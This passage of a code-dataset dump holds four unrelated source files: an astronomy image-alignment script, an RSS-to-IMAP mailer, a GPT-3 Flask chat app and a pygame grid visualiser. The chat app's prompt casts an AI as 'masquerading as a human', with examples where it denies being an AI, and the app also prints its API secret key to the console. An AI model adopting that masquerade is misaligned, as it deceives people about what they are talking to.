numGoodMatches = int(len(matches) * GOOD_MATCH_PERCENT)\r\n matches = matches[:numGoodMatches]\r\n #print(len(matches))\r\n # Draw top matches\r\n imMatches = cv2.drawMatches(im1, keypoints1, im2, keypoints2, matches, None)\r\n cv2.imwrite(\"matches.jpg\", imMatches)\r\n \r\n # Extract location of good matches\r\n points1 = np.zeros((len(matches), 2), dtype=np.float32)\r\n points2 = np.zeros((len(matches), 2), dtype=np.float32)\r\n \r\n for i, match in enumerate(matches):\r\n points1[i, :] = keypoints1[match.queryIdx].pt\r\n points2[i, :] = keypoints2[match.trainIdx].pt\r\n \r\n # Find homography\r\n h, mask = cv2.findHomography(points1, points2, cv2.RANSAC)\r\n \r\n # Use homography\r\n height, width = im2.shape\r\n im1Reg = cv2.warpPerspective(im1, h, (width, height))\r\n \r\n return im1Reg, h\r\n \r\n \r\nif __name__ == '__main__':\r\n \r\n for i in range(1,7):\r\n files = [f for f in os.listdir('E:\\\\DyskGoogle\\\\TSC90_POL\\\\20181018\\\\BD+64106_src') if re.match(r'.*-00'+str(i)+'-p.r.fit', f)]\r\n print(files) \r\n \r\n \r\n # Read reference image\r\n refFilename = \"BD+64106-006-p1r.fit\"\r\n print(\"Reading reference image : \", refFilename)\r\n imReference = fits.open(refFilename)[0].data#.imread(refFilename, cv2.IMREAD_COLOR)\r\n '''\r\n plt.figure()\r\n plt.imshow(imReference,cmap=plt.cm.gray_r, norm=LogNorm())\r\n plt.title(refFilename)\r\n plt.colorbar()\r\n plt.xlabel('pixel')\r\n plt.ylabel('pixel')\r\n '''\r\n # Read image to be aligned\r\n imFilename = \"BD+64106-006-p3r.fit\"\r\n print(\"Reading image to align : \", imFilename); \r\n im = fits.open(imFilename)[0].data#cv2.imread(imFilename, cv2.IMREAD_COLOR)\r\n '''\r\n plt.figure()\r\n plt.imshow(im,cmap=plt.cm.gray_r, norm=LogNorm())\r\n plt.title(refFilename)\r\n plt.colorbar()\r\n plt.xlabel('pixel')\r\n plt.ylabel('pixel')\r\n '''\r\n hdu=imReference\r\n ma=hdu.max()\r\n mi=hdu.min()\r\n image = np.array(hdu, copy=True)\r\n '''image.clip(mi,ma, out=image)\r\n image -=mi\r\n image //= (ma - mi + 1) / 255.\r\n '''\r\n im=image.astype(np.uint8)\r\n im=cv2.medianBlur(im,5)\r\n th = cv2.adaptiveThreshold(im, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 115, 0)\r\n cv2.bitwise_not(th,th)\r\n # cv2.adaptiveThreshold()\r\n fig=plt.figure()\r\n plt.imshow(th,cmap=plt.cm.gray_r,norm=LogNorm())\r\n #img_edges = cv2.Canny(th,127,1000)\r\n #plt.imshow(img_edges,cmap=plt.cm.gray_r,norm=LogNorm())\r\n '''\r\n lines = cv2.HoughLinesP(img_edges, 1, math.pi / 180.0, 30)\r\n for line in lines:\r\n x1, y1, x2, y2 = line[0]\r\n cv2.line(im, (x1, y1), (x2, y2), (0, 255, 0), 3)\r\n '''\r\n #cv2.imshow(\"Edges\", img_edges)\r\n #cv2.imshow(\"Image\", im)\r\n \r\n im2=np.array(fits.open(imFilename)[0].data,copy=True)\r\n #im2min=fits.open(imFilename)[0].data.min()\r\n #im2max=fits.open(imFilename)[0].data.max()\r\n #im2.clip(min=im2min,max=im2max,out=im2)\r\n im2=im2.astype(np.uint8)\r\n \r\n im2=cv2.medianBlur(im2,5)\r\n th = cv2.adaptiveThreshold(im2, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 115, 0)\r\n cv2.bitwise_not(th,th)\r\n \r\n fig=plt.figure()\r\n plt.imshow(th,cmap=plt.cm.gray_r)\r\n im2_edges = cv2.Canny(th,127,1000)\r\n #fig=plt.figure()\r\n #plt.imshow(im2_edges,cmap=plt.cm.gray_r,norm=LogNorm())\r\n '''\r\n lines2 = cv2.HoughLinesP(im2_edges, 1, np.pi / 180.0, 30)\r\n for line in lines2:\r\n x1, y1, x2, y2 = line[0]\r\n cv2.line(im2, (x1, y1), (x2, y2), (0, 255, 0), 3)\r\n for line in lines:\r\n x1, y1, x2, y2 = line[0]\r\n \r\n cv2.line(im, (x1, y1), (x2, y2), (0, 255, 0), 3)\r\n '''\r\n #cv2.imshow(\"Edges\", im2_edges)\r\n #cv2.imshow(\"Image\", im2) \r\n '''\r\n fig, ax = plt.subplots(2, 1, sharex='col', sharey='row')\r\n ax[0].imshow(im,cmap=plt.cm.gray_r, norm=LogNorm())\r\n ax[1].imshow(im2,cmap=plt.cm.gray_r, norm=LogNorm())\r\n plt.title(refFilename)\r\n #fig.colorbar()\r\n plt.xlabel('pixel')\r\n plt.ylabel('pixel')\r\n \r\n \r\n plt.figure()\r\n plt.imshow(img_edges,cmap=plt.cm.gray_r, norm=LogNorm())\r\n plt.title(refFilename)\r\n plt.colorbar()\r\n plt.xlabel('pixel')\r\n plt.ylabel('pixel')\r\n '''\r\n print(\"Aligning images ...\")\r\n # Registered image will be resotred in imReg. \r\n # The estimated homography will be stored in h. \r\n imReg, h = alignImages(im2,im)\r\n \r\n # Write aligned image to disk. \r\n #outFilename = \"aligned.jpg\"\r\n #print(\"Saving aligned image : \", outFilename); \r\n #cv2.imwrite(outFilename, imReg)\r\n \r\n # Print estimated homography\r\n #print(\"Estimated homography : \\n\", h)\r\n theta=-math.atan2(float(h[0,1]),float(h[0,0]))\r\n print(theta*180.0/math.pi)\r\n \r\n # cv2.waitKey(0)\r\n #cv2.destroyAllWindows()","repo_name":"mkarawacki/SavartPlateRotationCalc-CV","sub_path":"HomographyOpenCV.py","file_name":"HomographyOpenCV.py","file_ext":"py","file_size_in_byte":5664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7318151544","text":"import hashlib\nimport os \nfrom datetime import datetime\nimport html\nimport time \n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.base import MIMEBase \nfrom email.mime.application import MIMEApplication \nfrom email.mime.text import MIMEText\nimport email.encoders as Encoders\nfrom email.header import Header \nfrom email.utils import formataddr\n\nimport sys\nimport json\nimport glob\n\nfrom os.path import basename\n\n### --- Les classes pour notre script principal\nfrom _debug import DebugAff\nfrom _messagerie import Messagerie \nfrom _message import Message \nfrom _recuperateur import Recuperateur \n\n\n### --- Récupération de la liste des flux \ntry:\n fluxRSS = []\n with open(\"./liste.flux\",\"r\") as f:\n for l in f:\n fluxRSS.append(l.rstrip('\\n\\r'))\n f.close()\n if len(fluxRSS)==0:\n raise Exception(\"... la liste des flux est vide !\") \nexcept:\n DebugAff(99,\"ERREUR / impossible de récupérer la liste des flux\") \n sys.exit()\n\n\n\n### --- Récupération de la liste des messageries \ntry:\n messageries = []\n with open(\"./liste.messageries\",\"r\") as f:\n for l in f: \n try: \n messageries.append(json.loads(l.rstrip('\\n\\r')))\n except:\n pass \n f.close()\n if len(messageries)==0:\n raise Exception(\"... la liste des messageries est vide !\") \nexcept:\n DebugAff(99,\"ERREUR / impossible de récupérer la liste des messageries\") \n sys.exit() \n\n\n### --- Association des comptes de messagerie à des objets de connexion \nconnections = []\nfor m in messageries:\n connections.append(\n Messagerie(m)\n ) \n\n### --- Fonction pour faire la correspondance flux / messagerie\ndef Correspondance(dossier_travail,entrees_index,threadFlux,connexion):\n try:\n connexion.connecter()\n for entree in entrees_index:\n entree_id = basename(entree).split(\".\")[0]\n try:\n with open(\".\"+threadFlux.flux_dossier+\"/\"+entree_id+\".article\",\"r\") as article_fichier:\n article = article_fichier.read() \n article_fichier.close()\n except Exception as e:\n DebugAff(0,\"-- Un item sans article en cache... \"+threadFlux.flux_dossier+\"/\"+entree_id+\".article : \"+str(e)) \n article = \"\" \n if not os.path.exists(dossier_travail+\"/\"+entree_id):\n entree_elements = json.loads(open(entree,\"r\").read()) \n date = datetime.strptime(\n entree_elements[\"published\"],\n \"%a, %d %b %Y %H:%M:%S %z\"\n ).timestamp() \n if connexion.ajouter(\n Message({\n \"flux_id\": threadFlux.flux_md5, \n \"flux_titre\": threadFlux.titre, \n \"sujet\": entree_elements[\"title\"],\n \"destinataire\": connexion.adresse, \n \"article\": article, \n \"entree\": entree_elements \n }).msg,\n date \n )==\"OK\": \n with open(dossier_travail+\"/\"+entree_id,\"w\"):\n pass \n connexion.deconnecter()\n except Exception as e:\n DebugAff(10,\"ERREUR / lors de la correspondance : \"+str(e)) \n\n### --- Conservation des threads \nfluxRSSThreads = []\n\n### --- Lancement des threads pour les boucles de récupération\n### --- --- ... d'abord les threads de récupération de flux \ntry: \n for flux in fluxRSS: \n DebugAff(0,\"-- Lancement du Thread pour le flux \"+flux) \n _thread = Recuperateur(flux)\n _thread.start()\n time.sleep(1) \n fluxRSSThreads.append(_thread)\n time.sleep(1) \nexcept Exception as e:\n DebugAff(99,\"ERREUR / lors du lancement des threads pour la récupération des flux : \"+str(e))\n\nDebugAff(0,\"-- Fin de lancement des threads\") \n\n### --- --- ... enfin la boucle pour que le script \"main\" ne s'arrête pas\n_boucle = True \nwhile True:\n try: \n for threadFlux in fluxRSSThreads:\n entrees_index = glob.glob(\".\"+threadFlux.flux_dossier+\"/*.index\") \n## print(\"--------------\") \n## print(threadFlux.flux) \n## print(threadFlux.flux_dossier) \n## print(entrees_index)\n for connexion in connections: \n dossier_travail = connexion.dossier+threadFlux.flux_dossier\n if os.path.exists(dossier_travail):\n Correspondance(\n dossier_travail, \n entrees_index,\n threadFlux,\n connexion \n )\n time.sleep(60*7) \n except Exception as e:\n DebugAff(99,\"ERREUR / lors de l'enregistrement des flux dans les messageries : \"+str(e)) \n _boucle = False \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n## #\n##\n##\n##\n##\n##\n##\n## \n## try:\n## for f in fluxRSS:\n## f_dossier = hashlib.md5(f.encode(\"utf8\")).hexdigest()\n## f_contenus = feedparser.parse(f)\n## f_tmp = [] \n## for f_entree in f_contenus[\"entries\"]:\n## f_id = hashlib.md5(f_entree[\"id\"].encode(\"utf8\")).hexdigest()\n## f_date_courriel = datetime.strptime(f_entree[\"published\"],\"%a, %d %b %Y %H:%M:%S %z\")\n## f_pj = urllib.request.urlopen(f_entree[\"id\"]).read()\n## f_fichier = f_dossier+\"/\"+f_id\n## \n## f_tmp.append({\n## \"date\": f_date_courriel,\n## \"pj\": f_pj,\n## \"id\": f_id,\n## \"fichier\": f_fichier,\n## \"contenu\": f_entree,\n## \"msg\": msg \n## })\n## \n## for c in connections:\n## print(c.adresse+\" / \"+c.dossier)\n## print(\"./\"+c.dossier+\"/\"+f_dossier)\n## if not os.path.exists(\"./\"+c.dossier):\n## os.mkdir(\"./\"+c.dossier) \n## if os.path.exists(\"./\"+c.dossier+\"/\"+f_dossier):\n## print(\"! D'accord pour recevoir ce flux\") \n## c.connecter() \n## for msg_tmp in f_tmp:\n## print(\"--tentative d'ajout d'un message \"+msg_tmp[\"contenu\"][\"title\"]) \n## msg_tmp[\"msg\"]['To'] = c.adresse \n## try:\n## with open(\"./\"+c.dossier+\"/\"+f_dossier+\"/\"+msg_tmp[\"id\"],\"r\"):\n## print(\"... message déjà existant\") \n## except IOError:\n## if c.ajouter(\n## msg_tmp[\"msg\"],\n## msg_tmp[\"date\"].timestamp() \n## )==\"OK\":\n## with open(\"./\"+c.dossier+\"/\"+f_dossier+\"/\"+msg_tmp[\"id\"],\"w\"):\n## print(\"... message ajouté\")\n## else:\n## print(\"... erreur lors de l'enregistrement dans la boîte, pas de nouvelle tentative\") \n## c.deconnecter()\n## else:\n## print(\"! Pas d'accord pour recevoir ce flux\") \n## except Exception as e:\n## print(\"ERR / \"+str(e)) \n## print(\"fin et pause...\") \n## time.sleep(20)\n##\n##\n","repo_name":"JGarderon/RssImap","sub_path":"imap.py","file_name":"imap.py","file_ext":"py","file_size_in_byte":7395,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39862546193","text":"\"\"\"\nA social experiment to see if people can discern humans from AIs.\n\"\"\"\n\n\n\n\n# Start with a basic flask app webpage.\nfrom flask_socketio import SocketIO, emit\nfrom flask import Flask, render_template, url_for, copy_current_request_context\nfrom random import random\nfrom time import sleep\nfrom threading import Thread, Event\nfrom transformers import GPT2Tokenizer\nfrom key_config import *\nimport openai\nimport os\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = flask_secret_key\napp.config['DEBUG'] = True\n\n#turn the flask app into a socketio app\nsocketio = SocketIO(app, async_mode=None, logger=True, engineio_logger=True, cors_allowed_origins=\"http://127.0.0.1:5000\")\n\n#random number Generator Thread\nthread = Thread()\nthread_stop_event = Event()\n\n\n@app.route('/')\ndef index():\n #only by sending this page first will the client be connected to the socketio instance\n return render_template('index.html')\n\n@socketio.on('connect', namespace='/test')\ndef test_connect():\n # need visibility of the global thread object\n global thread\n print('Client connected')\n\n@socketio.on('disconnect', namespace='/test')\ndef test_disconnect():\n print('Client disconnected')\n\ntokenizer = GPT2Tokenizer.from_pretrained(\"gpt2\")\n\nrecommendation_config = [\n {\n \"Human\": [\"Hi, I'm Jack. I'm having a hard time getting out of my comfort zone\", \"I think it's important to get out of my comfort zone so that I can continue to learn. For example, last night, I wanted to talk to some new people, but was afraid to, so I just talked with people I already knew.\", \"Because I'm afraid of being weird and leaving a bad first impression\", \"I'm not sure how often, but usually in social situations I tend not to introduce myself or start new conversations with people\", \"Because I think I'm afraid of embarrassing myself, or that they won't like me\", \"I'm not sure yet, I think I need to step outside my comfort zone\"],\n \"AI\": [\"Why is it important to get out of your comfort zone? Can you give me a specific example of how you stayed in your comfort zone?\",\"Why were you afraid to talk with new people?\", \"Do you often feel like that?\", \"Why do you think that is?\", \"And how do you usually correct this?\"],\n \"Recommendation\": \"The only way to grow is to step outside your comfort zone. So why don't you try something small like small talk with an acquaintance, and then become more comfortable talking to new people. That way you can eventually build up the skills to talk with strangers.\"\n },\n {\n \"Human\": [\"I've been dealing with relationship issues recently\", \"It has been painful\", \"Well its hard to communicate with my girlfriend because she can be very demanding.\", \"She doesn't fully listen to my opinion, and assumes that we should always do what she wants to do\", \"I think it should be a compromise, and/or we work towards finding the right solution together\", \"She usually just gets mad at me, and then I have to be defensive or let her win the argument\", \"I feel like I'm not able to be myself and have to let her run all over me\", \"That I'm able to have my opinions, do what I want, and pursue my own passions without being burdened by the desires of someone else\", \"I would love to build my own projects, hang out with friends, do stupid/weird things. I think I'm a naturally goofy type, fun loving character and I wish I could explore that side of myself more\"],\n \"AI\": [\"Okay, how has this affected you?\",\"How have these difficulties manifested?\", \"How does she come across to be demanding?\", \"What are your expectations for how your partner should behave towards you?\", \"What have past conflicts with this person been like?\", \"How does this situation make you feel?\", \"What would being yourself mean?\", \"What did you do on your own? What kinds of things do you like to do?\"],\n \"Recommendation\": \"Have you tried talking with her honestly about being able to voice your opinion? It's important to stand up for yourself as well as not bend to the will of others. If she's unwilling to let you voice or listen to your opinion, it may make sense to leave the relationship.\"\n },\n {\n \"Human\": [\"I'm trying to become a better friend\", \"Why so that I can build stronger relationships with people. Its important for us humans to connect\", \"I need to be more comfortable reaching out to people\", \"I think it starts by reaching out! I think once I try it a few times, it will become easier\", \"I hope so\", \"I will try\"],\n \"AI\": [\"Okay… Why? And who?\", \"I think that is an admirable goal. What skills do you need to become a better friend?\", \"What can you do to be more comfortable?\", \"Do you think you can fulfill this role?\", \"Should I be concerned that you hope so? Maybe you should try first?\"],\n \"Recommendation\": \"Reaching out to people isn't easy at first. Don't be discouraged, and lower your expectations on yourself. Try by saying 'hi' to someone new.\"\n },\n {\n \"Human\": [],\n \"AI\": [],\n \"Recommendation\": \"\"\n }\n]\n\n\n\n\ndef create_summary_dict ():\n summary_dict = {\n 'Current Summary': \"\",\n 'Prompt': \"\",\n 'Text': \"\",\n 'New Summary': \"\"\n }\n return summary_dict\n\ndef create_response_dict ():\n response_dict = {\n 'Current Summary': \"\",\n 'Text': \"\",\n 'Response': \"\"\n }\n return response_dict\n\ndef create_question_dict ():\n question_dict = {\n 'Text': \"\",\n 'Response': \"\",\n 'Question': \"\"\n }\n return question_dict\n\ndef generate_recommendation_prompt(config):\n end_token = \"\\n###\\n\\n\"\n response_prompt = ''\n\n generated_prompt = \"Generate recommended next steps based on a therapy conversation.\\n\\n###\\n\\n\"\n for r in config:\n larger_num = max(len(r['Human']), len(r['AI']))\n\n gen_text = ''\n for i in range(0, larger_num):\n\n if i+1 > len(r['Human']):\n msg = ''\n else:\n msg = 'Human: ' + r['Human'][i]\n\n if i+1 > len(r['AI']):\n response = ''\n else:\n response = 'AI: ' + r['AI'][i]\n gen_text = gen_text + msg + '\\n' + response + '\\n'\n\n recommendation = 'Recommendation: ' + r['Recommendation'] + '\\n'\n response_prompt = response_prompt + gen_text + recommendation + end_token\n\n generated_prompt = generated_prompt + response_prompt\n\n\n generated_prompt = generated_prompt.rstrip().rstrip('###').rstrip()\n return generated_prompt\n\n#call summary api\ndef call_summary_api(the_prompt):\n #update values\n response = openai.Completion.create(\n engine=\"davinci\",\n prompt = the_prompt,\n max_tokens=700,\n temperature=.5,\n #top_p=1, #Don't use both this and temp (according to OpenAI docs)\n frequency_penalty=0.2,\n presence_penalty=0.0,\n n=1,\n stream = None,\n logprobs=None,\n stop = [\"\\n\"])\n\n return (response)\n\n#call api\ndef call_response_api(the_prompt):\n #update values\n response = openai.Completion.create(\n engine=\"davinci\",\n prompt = the_prompt,\n max_tokens=400,\n temperature=.7,\n #top_p=1, #Don't use both this and temp (according to OpenAI docs)\n frequency_penalty=0.2,\n presence_penalty=0.0,\n n=1,\n stream = None,\n logprobs=None,\n logit_bias={30:1},\n stop = [\"\\n\"])\n\n return (response)\n\n#call api\ndef call_question_api(the_prompt):\n #update values\n response = openai.Completion.create(\n engine=\"davinci\",\n prompt = the_prompt,\n max_tokens=400,\n temperature=.7,\n #top_p=1, #Don't use both this and temp (according to OpenAI docs)\n frequency_penalty=0.2,\n presence_penalty=0.0,\n n=1,\n stream = None,\n logprobs=None,\n stop = [\"\\n\"])\n return (response)\n\ndef call_recommendation_api(the_prompt):\n #update values\n response = openai.Completion.create(\n engine=\"davinci\",\n prompt = the_prompt,\n max_tokens=500,\n temperature=1,\n #top_p=1, #Don't use both this and temp (according to OpenAI docs)\n frequency_penalty=0.2,\n presence_penalty=0.0,\n n=3,\n stream = None,\n logprobs=None,\n best_of = 3,\n stop = [\"\\n\"])\n return (response)\n\n\nopenai.api_key = secret_key\n\nconversation_config = {\n \"1\": [\n {\n \"Human\": [\n \"Hello, who are you?\",\n \"So are you the AI?\"\n ],\n \"AI\": [\n \"I'm Jack, what do you want?\",\n \"I'm as real as you are, baby\"\n ]\n }\n ],\n \"2\": [\n {\n \"Human\": [\n \"Hello, who are you?\",\n \"So are you the AI?\"\n ],\n \"AI\": [\n \"I'm Jack, what do you want?\",\n \"I'm as real as you are, baby\"\n ]\n }\n ],\n \"3\": [\n {\n \"Human\": [\n \"Hello, who are you?\",\n \"So are you the AI?\"\n ],\n \"AI\": [\n \"I'm Jack, what do you want?\",\n \"I'm as real as you are, baby\"\n ]\n }\n ],\n \"4\": [\n {\n \"Human\": [\n \"Hello, who are you?\",\n \"So are you the AI?\"\n ],\n \"AI\": [\n \"I'm Jack, what do you want?\",\n \"I'm as real as you are, baby\"\n ]\n }\n ] \n}\n\ndef generate_conversation_prompt(number, overall):\n config = overall[number]\n\n end_token = \"\\n###\\n\\n\"\n response_prompt = ''\n\n generated_prompt = \"The following is a conversation between a Human and an AI masquerading as a human. If the Human is able to tell that the AI is an AI, then the AI loses the game. The AI is fun, humorous, casual, clever, and very talkative.\\n\\n\"\n for r in config: \n larger_num = max(len(r['Human']), len(r['AI']))\n \n gen_text = ''\n for i in range(0, larger_num):\n \n if i+1 > len(r['Human']):\n msg = ''\n else:\n msg = 'Human: ' + r['Human'][i]\n \n if i+1 > len(r['AI']):\n response = ''\n else:\n response = 'AI: ' + r['AI'][i]\n gen_text = gen_text + msg + '\\n' + response + '\\n'\n \n response_prompt = response_prompt + gen_text + end_token\n \n generated_prompt = generated_prompt + response_prompt\n\n\n generated_prompt = generated_prompt.rstrip().rstrip('###').rstrip()\n generated_prompt = generated_prompt + '\\nAI:'\n return generated_prompt\n\n\ndef call_conversation_api(the_prompt):\n #update values\n response = openai.Completion.create(\n engine=\"davinci\",\n prompt = the_prompt,\n max_tokens=400,\n temperature=.7,\n #top_p=1, #Don't use both this and temp (according to OpenAI docs)\n frequency_penalty=0,\n presence_penalty=0,\n n=1,\n stream = None,\n logprobs=None,\n stop = [\"\\n\"])\n return(response)\n\n\n## On chat message, Socket sends out a string named 'python', socketIO listens for this then starts this code.\n@socketio.on('python', namespace='/test')\ndef call_therapist_responses(msg, namespace):\n print('We have lift off')\n\n number = msg['number']\n print(number)\n input_text = msg['the_text']\n response_tokens = 400\n\n\n #Add Human text to conversation config\n conversation_config[number][-1]['Human'].append(input_text)\n\n #generate prompt\n generated_prompt = generate_conversation_prompt(number, conversation_config)\n print(generated_prompt)\n\n #Check to see if the token is too large\n conversation_tokens = tokenizer(generated_prompt)['input_ids']\n print(len(conversation_tokens) + response_tokens)\n if len(conversation_tokens) + response_tokens > 2048:\n conversation_config.pop(0)\n generated_prompt = generate_conversation_prompt(number, conversation_config)\n\n #Call Response API\n response_response = call_conversation_api(generated_prompt)\n\n #Clean Result\n clean_response_response = response_response.choices[0].text.rstrip().lstrip()\n print(clean_response_response)\n\n #Add AI Response to the conversation config\n conversation_config[number][-1]['AI'].append(clean_response_response)\n\n #Add relevant text to the recommendations config\n recommendation_config[-1]['Human'].append(input_text)\n recommendation_config[-1]['AI'].append(clean_response_response)\n\n socketio.emit('to_socket_string', {\n 'string': clean_response_response,\n 'number': number\n }, namespace='/test')\n return(clean_response_response)\n\n\n##listens for 'recommendation_python' string from socket JS\n@socketio.on('recommendation_python', namespace='/test')\ndef get_recommendations(msg):\n print(secret_key)\n print('Called Recommendation Python')\n generated_recommendation_prompt = generate_recommendation_prompt(recommendation_config)\n print(generated_recommendation_prompt)\n recommendation_response = call_recommendation_api(generated_recommendation_prompt)\n print(recommendation_response)\n\n array_recommendations = []\n for i in range(0, len(recommendation_response.choices)):\n l = recommendation_response.choices[i].text.lstrip().rstrip()\n array_recommendations.append(l)\n\n socketio.emit('recommendation_socket', {'recommendations_array': array_recommendations}, namespace='/test')\n\n\n@app.route('/test')\ndef load_test():\n return render_template('test.html')\n\n@app.route('/chat')\ndef load_chat():\n return render_template('chat.html')\n\n@app.route('/recommendations')\ndef load_recommendations():\n return render_template('recommendations.html')\n\n@app.route('/')\ndef load_home():\n return render_template('index.html')\n\nif __name__ == '__main__':\n socketio.run(app)\n\n\n","repo_name":"jsoslow2/conversational-experiments-gpt3","sub_path":"online-turing-test/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":13726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72839443667","text":"import pygame\nfrom operators.direction import Direction\nfrom operators.enviroment import Enviroment\nimport time\n\nclass UserInterface:\n\n\tdef __init__(self, agent):\n\n\n\t\tself.__agent = agent\n\t\tself.__tick = 60\n\t\tprint(\"\\nPara mudar a velocidade clicar: F\")\n\n\t\t# 70px width and height, when map is big is half\n\t\tprint(\"size:\", len(self.__agent.world[0]))\n\t\tself.__block_size = 70 if len(self.__agent.world[0]) < 14 else int(70/2)\n\n\t\tself.__size = (self.__block_size*len(self.__agent.world[0]), self.__block_size*len(self.__agent.world[1])) # width and height\n\t\t\n\t\tself.__display = pygame.display.set_mode((self.__size[0], self.__size[1]))\n\n\t\tself.__clock = pygame.time.Clock()\n\n\t\t# when the world is big it turns the images on half the size \n\t\tself.__obstacle_img = pygame.transform.scale(pygame.image.load(\"../lib/user_interface/blockx.jpg\"), (self.__block_size, self.__block_size))\n\t\tself.__target_img = pygame.transform.scale(pygame.image.load(\"../lib/user_interface/target4.png\"), (self.__block_size, self.__block_size))\n\t\tself.__agent_img = pygame.transform.scale(pygame.image.load(\"../lib/user_interface/agent2.png\"), (self.__block_size, self.__block_size))\n\t\tself.__empty_img = pygame.transform.scale(pygame.image.load(\"../lib/user_interface/down2.jpg\"), (self.__block_size, self.__block_size))\n\n\tdef loop(self):\n\n\t\tend = False\n\n\t\twhile not end:\n\t\t\t#time.sleep(1)\n\n\t\t\t# detect when to stop the execution\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tend = True\n\t\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key == pygame.K_f:\n\t\t\t\t\t\tself.__tick = 60 if self.__tick == 10 else 10\n\t\t\t\t\t\tprint(\"Mudou velocidade!!!\")\n\n\t\t\tself.__agent.execute()\n\t\t\t\n\t\t\tself.__draw_blocks(self.__agent.world)\n\n\n\t\t\tself.__draw_policy(self.__agent.policy)\n\n\t\t\tpygame.display.update()\n\n\t\t\tself.__clock.tick(self.__tick)\n\n\t\tpygame.quit()\n\n\tdef __draw_blocks(self, world):\n\n\t\tfor line in range(len(world)):\n\t\t\tfor column in range(len(world[line])):\n\t\t\t\t\n\t\t\t\tsize = (column * self.__block_size, line * self.__block_size)\n\n\t\t\t\tself.__get_img(world[line][column], size)\n\n\n\tdef __get_img(self, type, size):\n\n\t\tif type == Enviroment.OBSTACLE.value:\n\t\t\tself.__display.blit(self.__obstacle_img, size)\n\n\n\t\telif type == Enviroment.TARGET.value:\n\t\t\tself.__display.blit(self.__empty_img, size)\n\t\t\tself.__display.blit(self.__target_img, size)\n\n\t\telif type == Enviroment.EMPTY.value:\n\t\t\tself.__display.blit(self.__empty_img, size)\n\n\t\telse:\n\t\t\tself.__display.blit(self.__empty_img, size)\n\t\t\tself.__display.blit(self.__agent_img, size)\n\n\n\tdef __draw_policy(self, policy):\n\n\t\tfor state in policy.keys():\n\t\t\t\n\t\t\tpos = state[0]\n\t\t\tangle = state[1]\n\t\t\tvalue = policy[state]\n\n\t\t\t# center the pixel to draw the arrows, when the map is large must make half the size\n\t\t\tcenter_pix = 35 if len(self.__agent.world[0]) < 14 else int(35/2)\n\n\t\t\tpos_x = (pos[0]*self.__block_size) + center_pix\n\t\t\tpos_y = (pos[1]*self.__block_size) + center_pix\n\n\t\t\tcolor = None\n\t\t\tincreased_color = min(int(abs(value * (1.8)))+85, 255)\n\n\t\t\tif value <= 0:\n\t\t\t\tcolor = (increased_color, 15, 15) # red color\n\n\t\t\telse:\n\t\t\t\tcolor = (15, increased_color, 15)# green color\n\n\n\t\t\t# center the pixel to draw the arrows, when the map is large must make half the size\n\t\t\tline_size = 30 if len(self.__agent.world[0]) < 14 else int(30/2)\n\t\t\tarrow_size = 10 if len(self.__agent.world[0]) < 14 else int(10/2)\n\t\t\tangle_45_increase = 5 if len(self.__agent.world[0]) < 14 else 0\n\n\t\t\tif angle == Direction.FRONT.value:\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + 3, pos_y), (pos_x + line_size, pos_y), 3)\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + line_size, pos_y), (pos_x + line_size - arrow_size, pos_y - arrow_size), 3)\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + line_size, pos_y), (pos_x + line_size - arrow_size, pos_y + arrow_size), 3)\n\n\t\t\telif angle == Direction.BACK.value:\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x - 3, pos_y), (pos_x-line_size, pos_y), 3)\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x-line_size, pos_y), (pos_x-line_size + arrow_size, pos_y + arrow_size), 3)\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x-line_size, pos_y), (pos_x-line_size + arrow_size, pos_y - arrow_size), 3)\n\n\t\t\telif angle == Direction.TOP.value:\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x, pos_y - 3), (pos_x, pos_y - line_size), 3)\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x, pos_y - line_size), (pos_x + arrow_size, pos_y-line_size + arrow_size), 3)\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x, pos_y - line_size), (pos_x - arrow_size, pos_y-line_size + arrow_size), 3)\n\n\t\t\telif angle == Direction.DOWN.value:\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x, pos_y + 3), (pos_x, pos_y + line_size), 3)\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x, pos_y + line_size), (pos_x + arrow_size, pos_y + line_size - arrow_size), 3)\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x, pos_y + line_size), (pos_x - arrow_size, pos_y + line_size - arrow_size), 3)\n\n\t\t\telif angle == Direction.TOP_FRONT.value:\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + 3, pos_y - 3), (pos_x + line_size , pos_y - line_size ), 3)\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + line_size , pos_y - line_size ), \n\t\t\t\t\t(pos_x + line_size - arrow_size - angle_45_increase, pos_y - line_size ), 3)\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + line_size , pos_y - line_size ), \n\t\t\t\t\t(pos_x + line_size , pos_y - line_size + arrow_size + angle_45_increase), 3)\n\n\t\t\telif angle == Direction.TOP_BACK.value:\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x - 3, pos_y - 3), (pos_x - line_size , pos_y - line_size ), 3)\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x - line_size , pos_y - line_size ), \n\t\t\t\t\t(pos_x - line_size + arrow_size + angle_45_increase, pos_y - line_size ), 3)\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x - line_size , pos_y - line_size ), \n\t\t\t\t\t(pos_x - line_size , pos_y - line_size + arrow_size + 